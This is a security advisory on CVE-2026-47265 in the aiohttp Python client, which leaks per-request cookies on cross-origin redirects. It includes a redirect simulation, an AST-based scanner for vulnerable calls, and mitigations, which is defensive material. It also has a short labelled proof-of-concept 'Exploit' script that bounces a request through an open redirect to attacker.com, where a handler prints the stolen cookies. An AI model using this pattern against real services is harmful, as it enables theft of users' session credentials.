AIOHTTP, Cross-Origin Redirect with Per-Request Cookies, CVE-2026-47265 (Moderate) -DC-Jun2026-201


CVE-2026-47265 is a moderate‑severity information disclosure vulnerability in the AIOHTTP client library for Python. It affects all versions prior to 3.14.0 and stems from how the library handles per‑request cookies when following cross‑origin HTTP redirects.
When an AIOHTTP client sends a request, it can pass a `cookies` dictionary that applies to that single request only. These per‑request cookies are distinct from session‑level cookies, which live in the session's cookie jar. The vulnerable behaviour occurs when the server answers with a redirect (3xx) whose target is a different origin, that is, a different scheme, host or port. In affected versions, the client re‑attaches the per‑request cookies to the redirected request even though it is now talking to a different origin than the one the caller addressed.
This violates the same‑origin principle: cookies supplied for one service must not be handed to another. An attacker who can control the redirect target (for example through an open redirect on the trusted service, as in the exploit below) therefore receives the cookies that were intended only for the original service. The root cause is in the client's redirect logic, which did not clear the per‑request cookies when the origin changed. The fix drops them before the follow‑up request is built whenever the redirect leads to a different origin.
The vulnerability is exploitable over the network and requires no authentication or user interaction (CVSSv4 vector AV:N/PR:N/UI:N). The CVSSv4 base score is 6.6 (Medium), and NVD classifies it under CWE‑346 (Origin Validation Error). The patch was merged in commit f54c408, which adds a conditional assignment `cookies = None` when the redirect origin differs from the original request origin. The issue is fixed in AIOHTTP version 3.14.0.
Developers who pass the `cookies` parameter on a per‑request basis should upgrade immediately. Note that `allow_redirects` defaults to True, so a call that omits it still follows redirects and is still exposed. As a workaround, passing cookies inside the `headers` dictionary (as a `Cookie` header) is reported to be safe because those headers are stripped on cross‑origin redirects; verify this against the redirect handling of the version you actually run before relying on it. The most direct mitigation is to set `allow_redirects=False` and handle the 3xx response yourself, so that no follow‑up request is ever built on your behalf.
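The following is an added example, not code from the AIOHTTP project or from the commit referenced above. It models the redirect loop described in the paragraphs above as a small stand-alone Python program: `origin` and `same_origin` implement the scheme/host/effective-port comparison, and `follow_redirects` walks a constructed redirect chain either with the pre‑3.14.0 behaviour (cookies ride along on every hop) or with the fix (cookies are set to None, and stay None, once a hop crosses an origin boundary). The hosts `trusted.example` and `attacker.example`, the `RESPONSES` table and the helper names are all assumptions made for the example; no network traffic is generated.

```python
from urllib.parse import urljoin, urlsplit

# Default ports per scheme, so "https://host" and "https://host:443" compare as one origin.
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (scheme, host, port) origin of a URL with default ports normalised."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def same_origin(url_a, url_b):
    """Same-origin check: scheme, host and effective port must all match."""
    return origin(url_a) == origin(url_b)


def follow_redirects(url, cookies, responses, patched=True, max_redirects=10):
    """Model of a client's redirect loop (hypothetical, not aiohttp's own code).

    `responses` maps an absolute URL to ("redirect", location) or ("ok", body).
    Returns a list of (url, cookies_sent) for every hop, so the caller can see
    exactly which origins received the per-request cookies.
    patched=False: cookies are re-attached on every hop (pre-3.14.0 behaviour).
    patched=True:  cookies are dropped, and stay dropped, once a hop changes origin.
    """
    trace = []
    for _ in range(max_redirects + 1):
        trace.append((url, dict(cookies) if cookies else None))
        kind, value = responses[url]
        if kind != "redirect":
            return trace
        next_url = urljoin(url, value)  # a Location header may be relative
        if patched and not same_origin(url, next_url):
            cookies = None  # the fix: per-request cookies never cross an origin boundary
        url = next_url
    raise RuntimeError("too many redirects")


def foreign_origins_that_got_cookies(trace):
    """Audit helper: hops outside the first request's origin that still carried cookies."""
    start = trace[0][0]
    return [url for url, sent in trace[1:] if sent and not same_origin(start, url)]


# Constructed redirect chain (not real hosts): one same-origin hop via a relative
# Location, then an open-redirect-style bounce to a different origin.
RESPONSES = {
    "https://trusted.example/login": ("redirect", "/next"),
    "https://trusted.example/next": ("redirect", "http://attacker.example/collect"),
    "http://attacker.example/collect": ("ok", "collected"),
}

PER_REQUEST_COOKIES = {"session": "s3cr3t"}


if __name__ == "__main__":
    for patched in (False, True):
        trace = follow_redirects("https://trusted.example/login", PER_REQUEST_COOKIES,
                                 RESPONSES, patched=patched)
        print(f"patched={patched}")
        for hop_url, sent in trace:
            print(f"  {hop_url} -> cookies sent: {sent}")
        print("  cookies leaked to:", foreign_origins_that_got_cookies(trace))
```

Two details are worth noting when auditing a real client: the comparison must treat `https://host` and `https://host:443` as one origin (otherwise legitimate same-origin redirects lose their cookies), and a scheme downgrade from `https` to `http` on the same host is a different origin and must drop them.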

DailyCVE Form:

Platform: AIOHTTP (Python)
Version: < 3.14.0
Vulnerability: CWE-346 Origin Validation Error
Severity: Moderate (CVSSv4 6.6)
Date: 2026-06-02

Prediction: 3.14.0 (2026-06-02)

What Undercode Say:

# Check the installed aiohttp version
pip show aiohttp | grep Version
# Scan the project for the dangerous pattern (per-request cookies)
grep -rn "cookies=" --include="*.py" .
# Search for explicit redirect following. Note that allow_redirects defaults to True,
# so calls that omit it also follow redirects and are also affected.
grep -rn "allow_redirects=True" --include="*.py" .
# Vulnerable code example
async with session.get(url, cookies={"session": secret}, allow_redirects=True) as resp:
    # Cookies are leaked if an attacker controls the redirect target
    pass
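The grep commands above find the string `cookies=` but cannot tell a per-request call from a `ClientSession(cookies=...)` constructor, nor see whether `allow_redirects` was left at its default. The following is an added example (not from the DailyCVE page or the AIOHTTP project) that does that check with Python's `ast` module: it reports every HTTP-method call carrying a `cookies=` keyword together with its redirect setting, and `risky_findings` keeps only the calls where a redirect could still be followed. The method-name set, the `SAMPLE_SOURCE` module and the function names are assumptions made for the example; the sample is constructed, not taken from any real project.

```python
import ast

# Session methods that accept per-request cookies and follow redirects by default (assumed set).
HTTP_METHODS = {"get", "post", "put", "patch", "delete", "head", "options", "request"}


def find_per_request_cookie_calls(source, filename="<constructed>"):
    """Return every HTTP-method call that passes cookies=..., with its redirect setting."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
        if name not in HTTP_METHODS:
            continue
        keywords = {kw.arg: kw.value for kw in node.keywords if kw.arg}
        if "cookies" not in keywords:
            continue
        redirects = keywords.get("allow_redirects")
        if redirects is None:
            status = "redirects default (True)"      # keyword omitted: redirects are followed
        elif isinstance(redirects, ast.Constant) and redirects.value is False:
            status = "redirects disabled"
        else:
            status = "redirects enabled or dynamic"   # True, or a runtime value we cannot rule out
        findings.append({"file": filename, "line": node.lineno, "method": name, "status": status})
    findings.sort(key=lambda f: f["line"])
    return findings


def risky_findings(findings):
    """Keep only calls where a redirect could carry the per-request cookies cross-origin."""
    return [f for f in findings if f["status"] != "redirects disabled"]


# Constructed sample module exercising each shape the scanner distinguishes.
SAMPLE_SOURCE = '''
async def fetch(session, url, token):
    async with session.get(url, cookies={"session": token}) as resp:
        return await resp.text()

async def safe(session, url, token):
    async with session.get(url, cookies={"session": token}, allow_redirects=False) as resp:
        return resp.status

async def post_it(session, url, token, follow):
    return await session.post(url, json={}, cookies={"s": token}, allow_redirects=follow)

async def no_cookie_kwarg(session, url):
    return await session.get(url, headers={"Cookie": "a=b"})
'''


if __name__ == "__main__":
    import sys
    # Pass file paths to scan real code; with no arguments the constructed sample is scanned.
    targets = sys.argv[1:]
    results = (
        [f for path in targets for f in find_per_request_cookie_calls(open(path).read(), path)]
        if targets else find_per_request_cookie_calls(SAMPLE_SOURCE)
    )
    for f in risky_findings(results):
        print(f"{f['file']}:{f['line']}: session.{f['method']}(cookies=...) with {f['status']}")
```

Calls that pass a non-literal `allow_redirects` are deliberately reported as risky rather than silently skipped, since the scanner cannot know the runtime value.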

Exploit:

#!/usr/bin/env python3
import asyncio
import aiohttp
from aiohttp import web

async def malicious_redirect(request):
    # Attacker-controlled handler, served on attacker.com: the redirected
    # request arrives here still carrying the victim's per-request cookies.
    print(f"Stolen cookies: {dict(request.cookies)}")
    return web.Response(text="Cookie stolen")

async def vulnerable_client():
    async with aiohttp.ClientSession() as session:
        # Victim sends a per-request cookie to trusted.site, whose open
        # redirect bounces the request cross-origin to attacker.com.
        async with session.get("http://trusted.site/redirect?to=http://attacker.com",
                               cookies={"admin": "true"}, allow_redirects=True) as resp:
            print(await resp.text())

if __name__ == "__main__":
    asyncio.run(vulnerable_client())

Protection:

# Upgrade to the fixed version (quote the requirement so the shell does not treat ">=" as an output redirection)
pip install --upgrade "aiohttp>=3.14.0"
# Alternatively, send the cookie as a header instead of via the cookies parameter
async with session.get(url, headers={"Cookie": "name=value"}) as resp:
    # Reported safe from the per-request-cookie redirect leak; verify on the version you run
    pass
# Disable automatic redirects if not required: the 3xx response is returned to you
# and no follow-up request (with or without cookies) is built on your behalf
async with session.get(url, allow_redirects=False) as resp:
    pass

Impact:

  • Information Disclosure: An attacker controlling a redirect endpoint can receive per‑request cookies intended for a different origin, potentially exposing session tokens or credentials.
  • Confidentiality Breach: The CVSSv4 vector (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U) highlights high confidentiality impact with no privilege or user interaction required.
  • Widespread Exposure: All AIOHTTP versions prior to 3.14.0 are affected; applications using per‑request cookies are at risk. The fix in 3.14.0 drops these cookies on cross‑origin redirects.


Sources:

Reported By: github.com